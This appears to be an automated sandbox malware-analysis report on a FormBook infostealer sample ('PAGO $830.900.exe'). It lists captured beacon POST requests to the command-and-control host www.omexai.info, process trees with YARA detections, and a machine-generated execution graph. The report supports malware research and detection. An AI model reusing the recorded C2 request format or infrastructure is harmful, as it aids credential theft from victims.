                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 43 69 57 5a 50 32 61 51 75 4c 36 47 77 67 5a 68 31 35 78 70 56 57 63 48 71 59 46 49 54 54 56 72 51 50 42 79 4b 59 3d
                                                        Data Ascii: x0wHoJ8X=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5CiWZP2aQuL6GwgZh15xpVWcHqYFITTVrQPByKY=


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        54192.168.2.5536723.33.130.19080
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:21:53.431540966 CEST833OUTPOST /7xi5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Origin: http://www.omexai.info
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.omexai.info/7xi5/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 51 6a 74 48 77 4a 37 36 75 63 70 6c 61 79 37 4a 33 78 47 55 77 4a 43 73 42 66 4c 78 43 74 2b 6d 2b 2f 2f 53 36 4a 79 43 59 55 61 44 7a 76 4e 58 54 48 78 2b 46 32 43 74 62 6f 53 38 53 30 33 65 63 70 37 34 72 71 6b 61 70 4d 69 56 77 52 76 63 6d 73 4f 6d 72 6f 57 47 55 5a 4b 6c 65 2b 47 47 55 72 79 37 79 63 35 65 5a 2b 48 49 61 6e 62 31 64 34 66 71 78 31 57 2b 51 66 65 55 50 72 38 52 76 37 42 4b 6d 4e 7a 37 58 78 5a 36 31 36 6b 58 35 51 79 5a 6a 79 38 78 7a 66 78 73 64 4e 71 31 69 65 55 76 56 39 32 59 6b 5a 2f 62 70 71 67 41 4b 30 67
                                                        Data Ascii: x0wHoJ8X=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ616kX5QyZjy8xzfxsdNq1ieUvV92YkZ/bpqgAK0g


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        55192.168.2.5536733.33.130.19080
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:21:55.982006073 CEST1850OUTPOST /7xi5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Origin: http://www.omexai.info
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.omexai.info/7xi5/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 57 37 74 48 69 42 37 34 50 63 70 6d 61 79 37 41 58 78 46 55 77 4a 66 73 42 48 50 78 43 68 49 6d 34 7a 2f 54 5a 42 79 4b 4a 55 61 4e 44 76 4e 49 44 48 30 6a 31 32 79 74 62 35 56 38 54 45 33 65 63 70 37 34 70 43 6b 64 37 6f 69 47 67 52 6f 4b 57 73 43 69 72 70 44 47 55 42 30 6c 61 69 57 48 6c 4c 79 34 53 4d 35 66 73 69 48 45 61 6e 6a 79 64 34 48 71 78 49 49 2b 55 2b 6e 55 4d 32 62 52 6f 50 42 4f 48 49 30 6e 55 74 79 6e 44 75 51 64 37 6b 33 42 55 71 62 35 77 7a 70 7a 4e 35 63 2f 52 57 72 6d 77 39 42 61 31 4e 7a 5a 49 6d 75 48 76 70 76 69 6b 44 47 6c 56 37 62 7a 43 30 74 43 4b 32 69 6d 59 66 33 5a 5a 44 31 32 4e 45 2f 52 38 62 63 64 62 7a 65 72 46 6a 62 61 31 66 63 74 52 43 39 43 41 44 65 6b 4f 34 35 42 76 53 30 2b 2b 68 36 47 52 32 4a 6f 50 49 69 67 32 75 41 45 42 47 37 4c 77 58 79 34 51 41 45 6d 32 51 76 55 58 79 67 41 59 67 76 2b 65 2f 71 70 76 56 45 78 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7W7tHiB74Pcpmay7AXxFUwJfsBHPxChIm4z/TZByKJUaNDvNIDH0j12ytb5V8TE3ecp74pCkd7oiGgRoKWsCirpDGUB0laiWHlLy4SM5fsiHEanjyd4HqxII+U+nUM2bRoPBOHI0nUtynDuQd7k3BUqb5wzpzN5c/RWrmw9Ba1NzZImuHvpvikDGlV7bzC0tCK2imYf3ZZD12NE/R8bcdbzerFjba1fctRC9CADekO45BvS0++h6GR2JoPIig2uAEBG7LwXy4QAEm2QvUXygAYgv+e/qpvVEx2W9AfklD5W/jKcCk4WRbYd6qkIYV6+iXO/k7ZQ7+85PB+faC5FhYCHvabyN4Dq2tHidCT1YEkPTApS1a68zjTuimtQRtow0BW5loSkJjGTYtRL5+RyTnNtC23vXs1FOc23gZAK52Jc1qb3kJyilVA4FesR/uHV5UQdX8k6trTz/hv91eZxL9c2ce2gOl3ay7dKbWdEdThS9jAU+fHKBbuccgmqFOb54wLoKfmFT+RSaLh1o9noqAu3/AiKdwR1a/Qf3pzDEfaK0uTnmCh4mwS8u+JSYoYHYbrfeqx/MEWAUDWD3dQD9jyvt04YpzPDAOtn2ayckXBJy+Q2f1MzvQHh05nlEHbiNgeO9zFfWSXtazk3kZWJ9FGg6ko3hkUkiuaizzt8ODK5mToNovOLZ7oSlx9XEe7g3hr6GYGGYIqMpo2aq+lvmpuAi9rdMdtkC62lvo10tq4yA32DiOMu5T68NlJMWpv/pXlui8ZfnmoTSlNm5KsFrPCuAEb1Y/9klKVJVuWANAL5a5v6+rKKIzn91jgPGSR6/xg8L51sIn7gqNG5Wngq0GfNfnr/2XDtMyxX9m6phi4a3PcMI5cRidD8IdsMQm56MUPf7/6zJTqaq+61GIMceq0cLjjOcm1FCfZeGykvrH69J/eO2iNjp6oqocVCuRBMOmiW [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        56192.168.2.5536743.33.130.19080
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:21:58.520375967 CEST560OUTGET /7xi5/?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:21:58.972949028 CEST410INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Wed, 18 Sep 2024 14:21:58 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 270
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 78 30 77 48 6f 4a 38 58 3d 69 78 49 34 36 7a 77 44 4e 57 4f 6f 4b 30 64 2b 52 5a 38 4a 75 61 5a 44 59 2f 2f 51 56 47 6f 2b 71 73 46 4c 2b 76 34 68 7a 78 71 46 47 54 34 70 33 2b 38 57 74 6f 50 4b 47 55 73 2f 61 54 31 66 6b 44 6e 63 78 51 52 66 6c 70 71 4a 56 75 4e 51 46 62 45 4c 4e 54 2f 75 4c 43 44 74 35 6e 48 59 34 5a 31 61 69 44 73 47 48 2f 6c 55 72 61 32 74 5a 34 45 6d 51 6d 4a 4a 41 41 68 38 6f 37 73 66 58 51 3d 3d 26 32 56 44 6c 4a 3d 5a 32 56 64 68 54 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTx"}</script></head></html>


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:10:17:20
                                                        Start date:18/09/2024
                                                        Path:C:\Users\user\Desktop\PAGO $830.900.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PAGO $830.900.exe"
                                                        Imagebase:0xd70000
                                                        File size:1'280'512 bytes
                                                        MD5 hash:39C39D298AC66ACB85C47E7A647BAC4E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:10:17:21
                                                        Start date:18/09/2024
                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PAGO $830.900.exe"
                                                        Imagebase:0xd90000
                                                        File size:46'504 bytes
                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:10:17:32
                                                        Start date:18/09/2024
                                                        Path:C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe"
                                                        Imagebase:0x6b0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:4
                                                        Start time:10:17:35
                                                        Start date:18/09/2024
                                                        Path:C:\Windows\SysWOW64\netbtugc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                        Imagebase:0x980000
                                                        File size:22'016 bytes
                                                        MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:moderate
                                                        Has exited:false

                                                        General

                                                        Target ID:6
                                                        Start time:10:17:47
                                                        Start date:18/09/2024
                                                        Path:C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe"
                                                        Imagebase:0x6b0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:9
                                                        Start time:10:18:10
                                                        Start date:18/09/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff79f9e0000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:3.3%
                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                          Signature Coverage:3.6%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:66
                                                          execution_graph 91506 dc461c 91510 de0fde 91506->91510 91508 dc4627 91509 de0fde 53 API calls 91508->91509 91509->91508 91511 de1018 91510->91511 91516 de0feb 91510->91516 91511->91508 91512 de101a 91554 d8f9a5 53 API calls 91512->91554 91514 de101f 91521 d78e90 91514->91521 91516->91511 91516->91512 91516->91514 91519 de1012 91516->91519 91553 d7cb70 39 API calls 91519->91553 91522 d78ea5 91521->91522 91539 d78ea2 91521->91539 91523 d78ead 91522->91523 91524 d78edb 91522->91524 91555 d95156 26 API calls 91523->91555 91526 db5ccc 91524->91526 91527 d78eed 91524->91527 91528 db5be5 91524->91528 91584 d95113 26 API calls 91526->91584 91572 d8faa3 51 API calls 91527->91572 91535 db5c5e 91528->91535 91573 d8fd8b 91528->91573 91529 d78ebd 91556 d8fd5b 91529->91556 91532 db5ce4 91532->91532 91583 d8faa3 51 API calls 91535->91583 91536 d78ec7 91566 d7b606 91536->91566 91544 d77cf8 91539->91544 91540 d8fd5b 22 API calls 91542 db5c55 91540->91542 91541 db5c2e 91541->91540 91543 d7b606 22 API calls 91542->91543 91543->91535 91545 db563c 91544->91545 91546 d77d0a 91544->91546 91610 dd09c0 22 API calls __fread_nolock 91545->91610 91600 d77d1b 91546->91600 91549 d77d16 91549->91511 91550 db5646 91552 db5652 91550->91552 91611 d7c1c3 91550->91611 91553->91511 91554->91514 91555->91529 91559 d8fd60 91556->91559 91558 d8fd7a 91558->91536 91559->91558 91562 d8fd7c 91559->91562 91585 d9e99c 91559->91585 91592 d94e3d 7 API calls 2 library calls 91559->91592 91561 d905ed 91594 d93234 RaiseException 91561->91594 91562->91561 91593 d93234 RaiseException 91562->91593 91565 d9060a 91565->91536 91567 d7b615 _wcslen 91566->91567 91568 d8fd8b 22 API calls 91567->91568 91569 d7b63d __fread_nolock 91568->91569 91570 d8fd5b 22 API calls 91569->91570 91571 d7b653 91570->91571 91571->91539 91572->91529 91575 d8fd5b 91573->91575 91574 d9e99c ___std_exception_copy 21 API calls 91574->91575 91575->91574 91576 d8fd7a 91575->91576 91579 d8fd7c 91575->91579 91597 d94e3d 7 API calls 2 library calls 91575->91597 91576->91541 91578 d905ed 91599 d93234 RaiseException 91578->91599 91579->91578 91598 d93234 RaiseException 91579->91598 91582 d9060a 91582->91541 91583->91526 91584->91532 91590 da37b0 _abort 91585->91590 91586 da37ee 91596 d9f269 20 API calls _abort 91586->91596 91588 da37d9 RtlAllocateHeap 91589 da37ec 91588->91589 91588->91590 91589->91559 91590->91586 91590->91588 91595 d94e3d 7 API calls 2 library calls 91590->91595 91592->91559 91593->91561 91594->91565 91595->91590 91596->91589 91597->91575 91598->91578 91599->91582 91601 d77d2a 91600->91601 91607 d77d5e __fread_nolock 91600->91607 91602 db566d 91601->91602 91603 d77d51 91601->91603 91601->91607 91604 d8fd5b 22 API calls 91602->91604 91615 d7be83 91603->91615 91606 db567c 91604->91606 91608 d8fd8b 22 API calls 91606->91608 91607->91549 91609 db56b0 __fread_nolock 91608->91609 91610->91550 91612 d7c1e6 __fread_nolock 91611->91612 91613 d7c1d7 91611->91613 91612->91552 91613->91612 91614 d8fd8b 22 API calls 91613->91614 91614->91612 91617 d7be99 91615->91617 91619 d7be94 __fread_nolock 91615->91619 91616 dc03ea 91617->91616 91618 d8fd8b 22 API calls 91617->91618 91618->91619 91619->91607 91620 d9037b 91621 d90387 ___scrt_is_nonwritable_in_current_image 91620->91621 91650 d8fe31 91621->91650 91623 d904e1 91688 d907bf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 91623->91688 91624 d9038e 91624->91623 91627 d903b8 91624->91627 91626 d904e8 91689 d94de2 28 API calls _abort 91626->91689 91639 d903f7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 91627->91639 91661 da240d 91627->91661 91629 d904ee 91690 d94d94 28 API calls _abort 91629->91690 91633 d904f6 91634 d903d7 91636 d90458 91669 d908d9 91636->91669 91638 d9045e 91673 d7368b 91638->91673 91639->91636 91684 d94daa 38 API calls 2 library calls 91639->91684 91644 d9047a 91644->91626 91645 d9047e 91644->91645 91646 d90487 91645->91646 91686 d94d85 28 API calls _abort 91645->91686 91687 d8ffc0 13 API calls 2 library calls 91646->91687 91649 d9048f 91649->91634 91651 d8fe3a 91650->91651 91691 d90618 IsProcessorFeaturePresent 91651->91691 91653 d8fe46 91692 d92c24 10 API calls 3 library calls 91653->91692 91655 d8fe4b 91656 d8fe4f 91655->91656 91693 da22a7 91655->91693 91656->91624 91659 d8fe66 91659->91624 91664 da2424 91661->91664 91662 d90a0c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 91663 d903d1 91662->91663 91663->91634 91665 da23b1 91663->91665 91664->91662 91666 da23e0 91665->91666 91667 d90a0c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 91666->91667 91668 da2409 91667->91668 91668->91639 91768 d922d0 91669->91768 91672 d908ff 91672->91638 91674 d73697 IsThemeActive 91673->91674 91675 d736f2 91673->91675 91770 d94ed3 91674->91770 91685 d90912 GetModuleHandleW 91675->91685 91677 d736c2 91776 d94f39 91677->91776 91679 d736c9 91783 d73656 SystemParametersInfoW SystemParametersInfoW 91679->91783 91681 d736d0 91784 d7445d 91681->91784 91683 d736d8 SystemParametersInfoW 91683->91675 91684->91636 91685->91644 91686->91646 91687->91649 91688->91626 91689->91629 91690->91633 91691->91653 91692->91655 91697 dad196 91693->91697 91696 d92c4d 8 API calls 3 library calls 91696->91656 91698 dad1b3 91697->91698 91701 dad1af 91697->91701 91698->91701 91703 da4b8b 91698->91703 91700 d8fe58 91700->91659 91700->91696 91715 d90a0c 91701->91715 91704 da4b97 ___scrt_is_nonwritable_in_current_image 91703->91704 91722 da2eee EnterCriticalSection 91704->91722 91706 da4b9e 91723 da503f 91706->91723 91708 da4bad 91709 da4bbc 91708->91709 91736 da4a1f 29 API calls 91708->91736 91738 da4bd8 LeaveCriticalSection _abort 91709->91738 91712 da4bb7 91737 da4ad5 GetStdHandle GetFileType 91712->91737 91714 da4bcd __fread_nolock 91714->91698 91716 d90a15 91715->91716 91717 d90a17 IsProcessorFeaturePresent 91715->91717 91716->91700 91719 d90bdd 91717->91719 91767 d90ba1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 91719->91767 91721 d90cc0 91721->91700 91722->91706 91724 da504b ___scrt_is_nonwritable_in_current_image 91723->91724 91725 da5058 91724->91725 91726 da506f 91724->91726 91747 d9f269 20 API calls _abort 91725->91747 91739 da2eee EnterCriticalSection 91726->91739 91729 da505d 91748 da277c 26 API calls _strftime 91729->91748 91731 da50a7 91749 da50ce LeaveCriticalSection _abort 91731->91749 91732 da5067 __fread_nolock 91732->91708 91733 da507b 91733->91731 91740 da4f90 91733->91740 91736->91712 91737->91709 91738->91714 91739->91733 91750 da4c0d 91740->91750 91742 da4faf 91758 da2958 91742->91758 91743 da4fa2 91743->91742 91757 da3395 11 API calls 2 library calls 91743->91757 91746 da5001 91746->91733 91747->91729 91748->91732 91749->91732 91756 da4c1a _abort 91750->91756 91751 da4c5a 91765 d9f269 20 API calls _abort 91751->91765 91752 da4c45 RtlAllocateHeap 91754 da4c58 91752->91754 91752->91756 91754->91743 91756->91751 91756->91752 91764 d94e3d 7 API calls 2 library calls 91756->91764 91757->91743 91759 da2963 RtlFreeHeap 91758->91759 91763 da298c __dosmaperr 91758->91763 91760 da2978 91759->91760 91759->91763 91766 d9f269 20 API calls _abort 91760->91766 91762 da297e GetLastError 91762->91763 91763->91746 91764->91756 91765->91754 91766->91762 91767->91721 91769 d908ec GetStartupInfoW 91768->91769 91769->91672 91771 d94edf ___scrt_is_nonwritable_in_current_image 91770->91771 91833 da2eee EnterCriticalSection 91771->91833 91773 d94eea pre_c_initialization 91834 d94f2a 91773->91834 91775 d94f1f __fread_nolock 91775->91677 91777 d94f5f 91776->91777 91778 d94f45 91776->91778 91777->91679 91778->91777 91838 d9f269 20 API calls _abort 91778->91838 91780 d94f4f 91839 da277c 26 API calls _strftime 91780->91839 91782 d94f5a 91782->91679 91783->91681 91785 d7446d __wsopen_s 91784->91785 91840 d7c25d 91785->91840 91789 d744a0 IsDebuggerPresent 91790 db370f MessageBoxA 91789->91790 91791 d744ae 91789->91791 91792 db3727 91790->91792 91791->91792 91793 d744cb 91791->91793 91983 d78f2c 22 API calls 91792->91983 91924 d7480e 91793->91924 91797 d744ea GetFullPathNameW 91940 d784e7 91797->91940 91799 d74529 91952 d736fb 91799->91952 91800 d7453d 91802 db3764 SetCurrentDirectoryW 91800->91802 91803 d74545 91800->91803 91802->91803 91804 d74550 91803->91804 91984 dd15a7 AllocateAndInitializeSid CheckTokenMembership FreeSid 91803->91984 91968 d745ae 7 API calls 91804->91968 91807 db377f 91807->91804 91810 db3791 91807->91810 91985 d758e5 91810->91985 91811 d7455a 91817 d7456f 91811->91817 91972 d756c2 91811->91972 91813 db379a 91815 d7b606 22 API calls 91813->91815 91816 db37a8 91815->91816 91819 db37b0 91816->91819 91820 db37d7 91816->91820 91818 d7458a 91817->91818 91982 d74b1d Shell_NotifyIconW ___scrt_fastfail 91817->91982 91824 d74591 SetCurrentDirectoryW 91818->91824 91992 d752b7 91819->91992 91822 d752b7 22 API calls 91820->91822 91826 db37d3 GetForegroundWindow ShellExecuteW 91822->91826 91825 d745a5 91824->91825 91825->91683 91830 db3808 91826->91830 91829 d77cf8 22 API calls 91831 db37c9 91829->91831 91830->91818 91832 d752b7 22 API calls 91831->91832 91832->91826 91833->91773 91837 da2f36 LeaveCriticalSection 91834->91837 91836 d94f31 91836->91775 91837->91836 91838->91780 91839->91782 91841 d8fd8b 22 API calls 91840->91841 91842 d7c272 91841->91842 91843 d8fd5b 22 API calls 91842->91843 91844 d74479 GetCurrentDirectoryW 91843->91844 91845 d74862 91844->91845 91846 d7c25d 22 API calls 91845->91846 91847 d74878 91846->91847 92001 d76485 91847->92001 91849 d74896 91850 d758e5 24 API calls 91849->91850 91851 d748aa 91850->91851 91852 d7b606 22 API calls 91851->91852 91853 d748b7 91852->91853 92015 d7686d 91853->92015 91856 db3892 92082 de2c17 91856->92082 91857 d748d8 91860 d7c1c3 22 API calls 91857->91860 91859 db38a5 91861 db38b1 91859->91861 92108 d768db 91859->92108 91862 d748ee 91860->91862 91865 d768db 68 API calls 91861->91865 92037 d7890f 91862->92037 91867 db38c7 91865->91867 91871 d74aaf 22 API calls 91867->91871 91868 d7b606 22 API calls 91869 d74907 91868->91869 92040 d7c117 91869->92040 91873 db38e4 91871->91873 91872 d74917 91874 d7b606 22 API calls 91872->91874 91875 d74aaf 22 API calls 91873->91875 91876 d7493d 91874->91876 91878 db3900 91875->91878 91877 d7c117 41 API calls 91876->91877 91879 d7494c 91877->91879 91880 d758e5 24 API calls 91878->91880 91884 d7c25d 22 API calls 91879->91884 91881 db3926 91880->91881 91882 d74aaf 22 API calls 91881->91882 91883 db3932 91882->91883 91885 d7c1c3 22 API calls 91883->91885 91886 d7496a 91884->91886 91887 db3940 91885->91887 92044 d74aaf 91886->92044 91889 d74aaf 22 API calls 91887->91889 91891 db394f 91889->91891 91895 d7c1c3 22 API calls 91891->91895 91893 d74984 91893->91867 91894 d7498e 91893->91894 91896 d949b8 _strftime 40 API calls 91894->91896 91897 db3965 91895->91897 91898 d74999 